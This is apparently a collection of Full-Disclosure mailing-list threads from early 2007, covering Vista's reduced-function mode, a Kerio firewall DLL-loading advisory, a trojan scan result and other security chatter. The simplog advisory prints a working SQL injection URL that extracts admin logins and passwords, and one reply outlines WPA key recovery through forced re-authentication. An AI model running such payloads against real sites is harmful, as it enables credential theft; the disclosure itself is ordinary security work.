Re: [Full-disclosure] [OOT] Thesis for master degree

[andur matrix]

Hi,

First make sure which topic you are interested: attacking or defending. They
are of quite different philosophy. If you are into attacking in nature, you
can not do very well in defending. You will find it boring.

andur.


On 12/18/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:


On Sat, 16 Dec 2006 17:55:50 GMT, Aaron Gray said:
>
> >- Disassembling Vista Security
>
> This is illegal. So not a very good idea for the thesis.

This of course is *very* dependent on what country you are in.

In the US, the most important law involved would probably be the DMCA,
which *does* have an exception for reverse engineering for compatibility
research (17 USC 1201(f)), encryption research (17 USC 1201(g)), and
security testing (17 USC 1201(j)).


http://www.law.cornell.edu/uscode/html/uscode17/usc_sec_17_1201000-.html

Note that 17 USC 1201(j)(2) *specifically* hints that you *really* want
an in-writing "Get Out Of Jail Free" card for 18 USC 1030 and related.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Gmail XSS?

[Denzity]

There's reports of a gmail xss in the wild that will steal someone's contact
list and email if they website is visited while being logged in to gmail.

http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

I can't find this on Bugtraq or any release. Anyone have any more info or a
PoC?

Thanks, Denzity.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Kerio Fake 'iphlpapi' DLL injection Vulnerability

[Matousec - Transparent security Research]

Hello,

We would like to inform you about a vulnerability Sunbelt Kerio Personal 
Firewall:

Description:

When Sunbelt Kerio Personal Firewall (SKPF) loads dependant modules, it relies 
on the operating system. System library 
iphlpapi.dll is located in the system directory but the main SKPF service, 
which requires and loads this DLL, is located 
in the installation directory of SKPF. This is why it tries to find 
iphlpapi.dll in its installation directory at first 
and then, if it is not found in this directory, it tries to find it in the 
system directory. Moreover, it is possible to 
create new files in the installation directory of SKPF. A malicious application 
can create a fake iphlpapi.dll in the 
installation directory of SKPF, which will be loaded by the operating system 
into the SKPF service during its 
initialization. This is how the malicious application is able to execute an 
arbitrary code inside SKPF service and 
bypass any of its security mechanisms.


Vulnerable software:

 * Sunbelt Kerio Personal Firewall 4.3.268
 * Sunbelt Kerio Personal Firewall 4.3.246
 * probably all versions of Sunbelt Kerio Personal Firewall 4
 * possibly older versions of Sunbelt Kerio Personal Firewall



More details and a proof of concept including its source code are available 
here:
http://www.matousec.com/info/advisories/Kerio-Fake-iphlpapi-DLL-injection.php


Regards,


-- 
Matousec - Transparent security Research
http://www.matousec.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vista Reduced Function mode triggered

[Geo.]

The other day I used my router to limit my Vista laptop from talking to 
anything but one subnet on the internet. 3 days later suddenly some things 
would not work.

Solitaire failed to start, click on it and you get the magic donut showing 
it's starting up then nothing.

Right click on network and pick properties you get the magic donut showing 
it's starting up then nothing.

So I removed the routes so Vista could once again phone home and within a 
minute or two both solitaire and network properties worked just fine.

Now this Vista system is less than 30 days old and has already been 
activated. So the claims that Reduced Function mode only kicks in if you 
don't activate within 30 days is bunk if this is Reduced Function mode.

So I decided to trigger RF mode on purpose to see how it responds. I stopped 
the Software License service which claims that doing so will trigger RF 
mode. 24 hours later solitaire, network properties, and control panel all 
show the same behavior, the magic donut showing they are starting up then 
nothing. No events in event log, nothing.

I then started the Software License service and presto like magic these 
functions work again. So I'm convinced that the machine being routed so it 
can't talk to MS triggered RF mode within a few days. Now to me this seems 
pretty clear even though it wasn't a real scientific method of testing. And 
further, this looks to me like an accident waiting to happen. I mean imagine 
if MS fell off the planet we would have a pretty major problem as the bulk 
of the worlds computers started shutting down, talk about a security issue?

So anyone here with a bit more technical expertise want to pick up this ball 
and run with it?

Geo. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Authenticated users can sniff WPA traffic?

[coderman]

On 12/31/06, /dev/null <[EMAIL PROTECTED]> wrote:
> ...
> recently I came across this link:
> http://seclists.org/pen-test/2005/Nov/0073.html
>
> Basicaly, it states that authenticated users, in combination with ARP
> poisoning, can sniff WPA traffic. Can anybody confirm this is possible? If
> that's true, is there any way to prevent this?

of course it's true.  don't let ARP poisoning occur on your network.
most good wifi security tools / systems will check for this among the
other usual masquerading (rogue AP's, injection with invalid
timestamps, etc).

note that a mandatory part of this attack is having auth credentials
for WPA-PSK or WPA-Enterprise (EAP/TLS,etc) so you can talk on the
network to mount this ARP poisoning attack.


> I would really appreciate any info/link/paper regarding topic.

any good IP routing text would be useful, particularly the interplay
between ethernet (and other L2 protocols) and IP via ARP/RARP.

as one last side note, if you've got the WPA-PSK secret via dictionary
attack you can combine this with disassociate injection to force all
clients to re-authenticate while you are listening so you can recover
the client keys (TKIP or CCMP) used for communication and get better
results since you no longer need the ARP hack which will be slower and
more brittle (you must remain in the loop) comparatively.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] simplog 0.9.3.2 SQL injection

[Javor Ninov]

Afected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006 )

Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to
their existing websites. Simplog is written in PHP and compatible with
multiple databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple

Vulnerability:
SQL Injection in archive.php
other files probably also affected

Example:
http://example.com/simplog/archive.php?blogid=1&pid=%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1

Vendor status:
NOT NOTIFIED


Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[php0t]

  Didn't have the chance / interest to meet Vista myself as of yet, but
if what you wrote isn't user error or something specific and limited to
only a few computers then excuse me a moment while i lmao. BTW, is there
anything in vista's agreement in legalish that could be translated into
'you agree that you feed your software internet' ? Maybe micro$ says
that this is needed to verify that you're running a legal OS every now
and then, so $uck it ? :-) Sorry for not having ideas just raising more
questions, hope somebody replies in a few pointing out the obvious.



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Geo.
Sent: Monday, January 01, 2007 8:27 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Vista Reduced Function mode triggered


The other day I used my router to limit my Vista laptop from talking to 
anything but one subnet on the internet. 3 days later suddenly some
things 
would not work.

Solitaire failed to start, click on it and you get the magic donut
showing 
it's starting up then nothing.

Right click on network and pick properties you get the magic donut
showing 
it's starting up then nothing.

So I removed the routes so Vista could once again phone home and within
a 
minute or two both solitaire and network properties worked just fine.

Now this Vista system is less than 30 days old and has already been 
activated. So the claims that Reduced Function mode only kicks in if you

don't activate within 30 days is bunk if this is Reduced Function mode.

So I decided to trigger RF mode on purpose to see how it responds. I
stopped 
the Software License service which claims that doing so will trigger RF 
mode. 24 hours later solitaire, network properties, and control panel
all 
show the same behavior, the magic donut showing they are starting up
then 
nothing. No events in event log, nothing.

I then started the Software License service and presto like magic these 
functions work again. So I'm convinced that the machine being routed so
it 
can't talk to MS triggered RF mode within a few days. Now to me this
seems 
pretty clear even though it wasn't a real scientific method of testing.
And 
further, this looks to me like an accident waiting to happen. I mean
imagine 
if MS fell off the planet we would have a pretty major problem as the
bulk 
of the worlds computers started shutting down, talk about a security
issue?

So anyone here with a bit more technical expertise want to pick up this
ball 
and run with it?

Geo. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Jeff Bernstein

[Simon Smith]

It has come to my attention that Jeff Bernstein has been falsely using the
names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
and development ordeal that happened earlier in 2001.

Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
will he ever be. Jeff Bernstein does not work with nor has he ever directly
worked with any of the SNOsoft Team Members.

If anyone has talked with, or speaks with Jeff Bernstein in the future and
if Mr. Bernstein mentions SNOsoft, please contact me immediately at
[EMAIL PROTECTED]

Thank you.

Regards, 
Simon Smith
SNOsoft Research Team
http://www.snosoft.com
   


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail XSS?

[Juha-Matti Laurio]

According to this news it was fixed already:
http://blogs.zdnet.com/Google/?p=434

See a quote of Google Security Team

- Juha-Matti


Denzity <[EMAIL PROTECTED]> wrote: 
>
> There's reports of a gmail xss in the wild that will steal someone's contact
> list and email if they website is visited while being logged in to gmail.
> 
> http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
> 
> I can't find this on Bugtraq or any release. Anyone have any more info or
> a PoC?
>
> Thanks, Denzity.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Geo.]

> anything in vista's agreement in legalish that could be translated into
> 'you agree that you feed your software internet' ?

http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx

Yep, specifies "internet" under requirements. Should specify unrestricted 
internet access if you ask me.

Geo. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Poof]

The issues that the original poster is having don't sound anything like
normal behavior. One of the scenarios expected in Vista would be a Laptop
that's been activated being used in a restricted internet work zone. And if
that laptop has been activated normally (The 1-time activation as provided
with the Windows install.) it shouldn't go to reduced mode. Further, it'll
give a 30 day warning prior to going to reduced mode if it's suddenly
deactivated asking for it to be reactivated. (Say a hardware change/etc.)

In the short, I am unable to repro this. I'm currently running Vista on two
systems; the other system is in a sandbox. (However, was "open" during the
activation process.)

Erm, from what I can see from the requirements, Internet is not required as
it's in the same format as Audio.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Geo.
Sent: Monday, January 01, 2007 3:35 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered


> anything in vista's agreement in legalish that could be translated into
> 'you agree that you feed your software internet' ?

http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx

Yep, specifies "internet" under requirements. Should specify unrestricted 
internet access if you ask me.

Geo. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security contact at TrendMicro

[Sebastian Wolfgarten]

Hi,

does anyknow know a security contact at TrendMicro? I was unable to find one 
on their website and tried both [EMAIL PROTECTED] as well as 
[EMAIL PROTECTED] but they bounced back. Anyone?

Thanks. Ah yeah, Happy New Year everyone!

Best regards,
Sebastian Wolfgarten

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Welcome to Pwndertino...

[K F (lists)]

Just in case you are drunk / hungover / out of town or whatever... this is a 
friendly reminder that MOAB has begun. 

http://projects.info-pull.com/moab/index.html

-KF 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Simcard 0day.

[Blue Boar]

dfklsddshd wrote:
> 1. Open attachment.

Does this actually work on people on a security mailing list?

BB

Complete scanning result of "Simcard.com", received in VirusTotal at
01.02.2007, 02:38:58 (CET).

Antivirus   Version Update  Result
AntiVir 7.3.0.2101.01.2007  TR/Spy.Banker.73216
Authentium  4.93.8  12.30.2006  no virus found
Avast   4.7.892.0   12.30.2006  no virus found
AVG 386 01.01.2007  no virus found
BitDefender 7.2 01.01.2007  GenPack:Generic.Banker.OT.924A93D1
CAT-QuickHeal   8.0001.01.2007  (Suspicious) - DNAScan
ClamAV  devel-20060426  01.01.2007  no virus found
DrWeb   4.3312.31.2006  WIN.MAIL.WORM.Virus
eSafe   7.0.14.001.01.2007  Suspicious Trojan/Worm
eTrust-InoculateIT  23.73.102   12.30.2006  no virus found
eTrust-Vet  30.3.3289   12.29.2006  no virus found
Ewido   4.0 01.01.2007  no virus found
Fortinet2.82.0.001.01.2007  suspicious
F-Prot  3.16f   12.30.2006  no virus found
F-Prot4 4.2.1.2912.30.2006  no virus found
Ikarus  T3.1.0.27   01.01.2007  Trojan-Spy.Win32.Banker.axc
Kaspersky   4.0.2.2401.02.2007  no virus found
McAfee  492912.29.2006  no virus found
Microsoft   1.1904  12.31.2006  no virus found
NOD32v2 195101.01.2007  probably unknown NewHeur_PE virus
Norman  5.80.02 12.31.2007  no virus found
Panda   9.0.0.4 01.01.2007  Suspicious file
Prevx1  V2  01.02.2007  no virus found
Sophos  4.13.0  01.01.2007  no virus found
Sunbelt 2.2.907.0   12.18.2006  VIPRE.Suspicious
TheHacker   6.0.3.141   01.01.2007  no virus found
VBA32   3.11.1  01.01.2007  no virus found
VirusBuster 4.3.19:901.01.2007  no virus found

Aditional Information
File size: 73216 bytes
MD5: 5f22c38e77383a68f865a2c8d9c84f0c
SHA1: c1a76dc5fa43d102b447057ce16ad44e8dcf456f
packers: YODA
packers: YodaProt
Sunbelt info: VIPRE.Suspicious is a generic detection for potential
threats that are deemed suspicious through heuristics.
VirusTotal is a free service offered by Hispasec Sistemas. There are no
guarantees about the availability and continuity of this service.
Although the detection rate afforded by the use of multiple antivirus
engines is far superior to that offered by just one product, these
results DO NOT guarantee the harmlessness of a file. Currently, there is
not any solution that offers a 100% effectiveness rate for detecting
viruses and malware.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Jay Sulzberger]

On Mon, 1 Jan 2007, Poof <[EMAIL PROTECTED]> wrote:

> The issues that the original poster is having don't sound anything like
> normal behavior. One of the scenarios expected in Vista would be a Laptop
> that's been activated being used in a restricted internet work zone. And if
> that laptop has been activated normally (The 1-time activation as provided
> with the Windows install.) it shouldn't go to reduced mode. Further, it'll
> give a 30 day warning prior to going to reduced mode if it's suddenly
> deactivated asking for it to be reactivated. (Say a hardware change/etc.)
>
> In the short, I am unable to repro this. I'm currently running Vista on two
> systems; the other system is in a sandbox. (However, was "open" during the
> activation process.)
>
> Erm, from what I can see from the requirements, Internet is not required as
> it's in the same format as Audio.

The issue is not: How Microsoft treats those whose boxes Microsoft has
Tojaned.

The issue is: Microsoft should not be root on my computer.

And no EULA can take away root from me and grant root to
Microsoft on any computer I own.

oo--JS.


>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Geo.
> Sent: Monday, January 01, 2007 3:35 PM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered
>
>
>> anything in vista's agreement in legalish that could be translated into
>> 'you agree that you feed your software internet' ?
>
> http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx
>
> Yep, specifies "internet" under requirements. Should specify unrestricted
> internet access if you ask me.
>
> Geo.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

[Moore, Robert]

Simon Smith of the SNOsoft Research Team provides the url
 >
but when you go there, you get:

The SNOsoft Research Team has been acquired by Netragard, L.L.C. 
  
http://www.netragard.com  

um, did someone forget to tell Mr. Smith ??
 
;-)
 
bob moore
---
Date: Mon, 01 Jan 2007 18:16:59 -0500
From: Simon Smith <[EMAIL PROTECTED]>
Subject: [Full-disclosure] Jeff Bernstein

It has come to my attention that Jeff Bernstein has been falsely using the
names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
and development ordeal that happened earlier in 2001.

Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
will he ever be. Jeff Bernstein does not work with nor has he ever directly
worked with any of the SNOsoft Team Members.

If anyone has talked with, or speaks with Jeff Bernstein in the future and
if Mr. Bernstein mentions SNOsoft, please contact me immediately at
[EMAIL PROTECTED]

Thank you.

Regards,
Simon Smith
SNOsoft Research Team
http://www.snosoft.com 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] simplog 0.9.3.2 SQL injection

[str0ke]

Javor,

It seems rgod found this vulnerability back in April of 2006.

http://www.milw0rm.com/exploits/1663

<>
  ii)
  http://[target]/[path]/index.php?blogid=[sql]
  http://[target]/[path]/archive.php?blogid=[sql]
  http://[target]/[path]/archive.php?m=[sql]
  http://[target]/[path]/archive.php?y=[sql]

/str0ke

On 1/1/07, Javor Ninov <[EMAIL PROTECTED]> wrote:
> Afected Software:
> simplog up to 0.9.3.2 (latest version - 12/05/2006 )
>
> Site:
> http://www.simplog.org
> Simplog provides an easy way for users to add blogging capabilities to
> their existing websites. Simplog is written in PHP and compatible with
> multiple databases. Simplog also features an RSS/Atom aggregator/reader.
> Powerful, yet simple
>
> Vulnerability:
> SQL Injection in archive.php
> other files probably also affected
>
> Example:
> http://example.com/simplog/archive.php?blogid=1&pid=%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
>
> Vendor status:
> NOT NOTIFIED
>
>
> Javor Ninov aka DrFrancky
> drfrancky shift+2 securax.org
> http://securitydot.net/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

[Simon Smith]

Very observant of you Bob, the SNOsoft site is not active right now. We hope
to reactivate it later on in 2007. Any more questions? :]

On 1/1/07 10:07 PM, "Moore, Robert" <[EMAIL PROTECTED]> wrote:

> Simon Smith of the SNOsoft Research Team provides the url
>  >
> but when you go there, you get:
> 
> The SNOsoft Research Team has been acquired by Netragard, L.L.C.
> 
> http://www.netragard.com 
> 
> um, did someone forget to tell Mr. Smith ??
>  
> ;-)
>  
> bob moore
> --
> -
> Date: Mon, 01 Jan 2007 18:16:59 -0500
> From: Simon Smith <[EMAIL PROTECTED]>
> Subject: [Full-disclosure] Jeff Bernstein
> 
> It has come to my attention that Jeff Bernstein has been falsely using the
> names of SNOsoft Research Team members. Moreover, Jeff Bernstein has been
> falsely associating himself with the SNOsoft/HP/DMCA vulnerability research
> and development ordeal that happened earlier in 2001.
> 
> Jeff Bernstein has never been affiliated with the SNOsoft Research Team nor
> will he ever be. Jeff Bernstein does not work with nor has he ever directly
> worked with any of the SNOsoft Team Members.
> 
> If anyone has talked with, or speaks with Jeff Bernstein in the future and
> if Mr. Bernstein mentions SNOsoft, please contact me immediately at
> [EMAIL PROTECTED]
> 
> Thank you.
> 
> Regards,
> Simon Smith
> SNOsoft Research Team
> http://www.snosoft.com
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Geo.]

> In the short, I am unable to repro this. I'm currently running Vista on
> two
> systems; the other system is in a sandbox. (However, was "open" during the
> activation process.)

One thing you might try is instead of cutting it off entirely from the
internet, use an external device to limit what internet addresses it can
talk to so that it has a valid and working gateway but it can't phone home.

Also, it didn't happen immediately, I implemented the routing and then it 
was 3 days before I noticed things weren't working (may have been less but I 
just didn't notice till then), tried rebooting to cure the problems, poked 
around at other things, nothing helped. Then upon removing the routing and 
letting it talk to the whole net it was only minutes before everything was 
working again.

Geo.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[php0t]

> One thing you might try is instead of cutting it off entirely from the
internet, use an external device to limit what internet 
> addresses it can talk to so that it has a valid and working gateway
but it can't phone home.

I doubt Vista wants to google for porn instead of phoning home.

After reading the other posts, I think the question is still there, if
you cut a vista's internet access after it's been activated, does it go
to reduced mode because of not being able to phone home? Anybody with
certain results on this?







___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Larry Seltzer]

>>if you cut a vista's internet access after it's been activated, does
it go to reduced mode because of not being able to phone home? 

It just can't be that simple. There has to be more to what happened to
the guy. Lots of computers are offline for several days at a time, it's
inconceivable that they didn't test that.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[php0t]

> It just can't be that simple. There has to be more to what happened to
the guy. Lots of computers are offline for several 
> days at a time, it's inconceivable that they didn't test that.

Yeah, probably - but just for the fun of it I'm curious what happened
(unless it's some dumb user error).






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Geo.]

> It just can't be that simple. There has to be more to what happened to
> the guy. Lots of computers are offline for several days at a time, it's
> inconceivable that they didn't test that.

Ok, as complete as I can be in the few minutes I have to post this.

During those three days I did a lot of poking around, stopping and starting 
services, switching from wired to wireless and back, trying to view high def 
video (which I still am not able to do in any video player except WMP for 
some reason) installing codecs and software, running into the event ID 4226 
tcp security connect limit, etc.

However I never got any notification of deactivation or any problem of that 
sort. Then on the third day suddenly solitaire would not start up and I 
couldn't get into network properties. I did a bunch of rebooting and trouble 
shooting trying to figure that out but got nowhere.

So I went back to trying to get high def video to work in Media player 
classic and figured perhaps it was trying to download a codec so I removed 
the routes. It didn't help the video but I quickly found network properties 
started working. So then I tried solitaire and it worked. This was all 
directly after removing the routes, there wasn't but a few minutes between 
letting it talk to the net and these apps starting to work again.

I decided this was probably reduced functionality in action but since I had 
never seen it before I needed some way to trigger it so I could compare 
since it would take 3 days to reproduce with route blocking. I disabled the 
software licensing service since it claims disabling that service will kick 
off reduced functionality mode. Nothing happened immediately but 24 hours 
later solitaire and network properties (and now control panel) would not 
start up. It was exactly the same apps and behavior. I enabled and started 
the software licensing service and in seconds things returned to fully 
functional just like removing the routes did.

So it's possible the routes didn't trigger it, but removing them sure cured 
it quickly so that is my guess at this point. Further testing is needed. I 
won't be testing it for a couple days as I need the laptop connected to 
other networks to try some other software I need to test. (that tcp limit 
may prove a problem for network monitoring)

Geo. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Simcard 0day.

[Randal T. Rioux]

Blue Boar wrote:
> dfklsddshd wrote:
>> 1. Open attachment.
> 
> Does this actually work on people on a security mailing list?
> 
>   BB
> 
> Complete scanning result of "Simcard.com", received in VirusTotal at
> 01.02.2007, 02:38:58 (CET).
>  

you would be quite surprised, i'm sure.

randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vista Reduced Function mode triggered

[Jason Miller]

lol i want to see this happen in a .edu unit where you can only access the
internet by going through a limited HTTP proxy that does not allow the
connect function, think it would give humourous results. unless it 'phones
home' by visiting a page and printing said info, which in that case it would
probably be simple enough to modify the server it goes to and make it think
its going to microsoft, in that event you could easily get cd keys if thats
how it verifies its a real vista copy.

On 1/1/07, Geo. <[EMAIL PROTECTED]> wrote:



> It just can't be that simple. There has to be more to what happened to
> the guy. Lots of computers are offline for several days at a time, it's
> inconceivable that they didn't test that.

Ok, as complete as I can be in the few minutes I have to post this.

During those three days I did a lot of poking around, stopping and
starting
services, switching from wired to wireless and back, trying to view high
def
video (which I still am not able to do in any video player except WMP for
some reason) installing codecs and software, running into the event ID
4226
tcp security connect limit, etc.

However I never got any notification of deactivation or any problem of
that
sort. Then on the third day suddenly solitaire would not start up and I
couldn't get into network properties. I did a bunch of rebooting and
trouble
shooting trying to figure that out but got nowhere.

So I went back to trying to get high def video to work in Media player
classic and figured perhaps it was trying to download a codec so I removed
the routes. It didn't help the video but I quickly found network
properties
started working. So then I tried solitaire and it worked. This was all
directly after removing the routes, there wasn't but a few minutes between
letting it talk to the net and these apps starting to work again.

I decided this was probably reduced functionality in action but since I
had
never seen it before I needed some way to trigger it so I could compare
since it would take 3 days to reproduce with route blocking. I disabled
the
software licensing service since it claims disabling that service will
kick
off reduced functionality mode. Nothing happened immediately but 24 hours
later solitaire and network properties (and now control panel) would not
start up. It was exactly the same apps and behavior. I enabled and started
the software licensing service and in seconds things returned to fully
functional just like removing the routes did.

So it's possible the routes didn't trigger it, but removing them sure
cured
it quickly so that is my guess at this point. Further testing is needed. I
won't be testing it for a couple days as I need the laptop connected to
other networks to try some other software I need to test. (that tcp limit
may prove a problem for network monitoring)

Geo.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/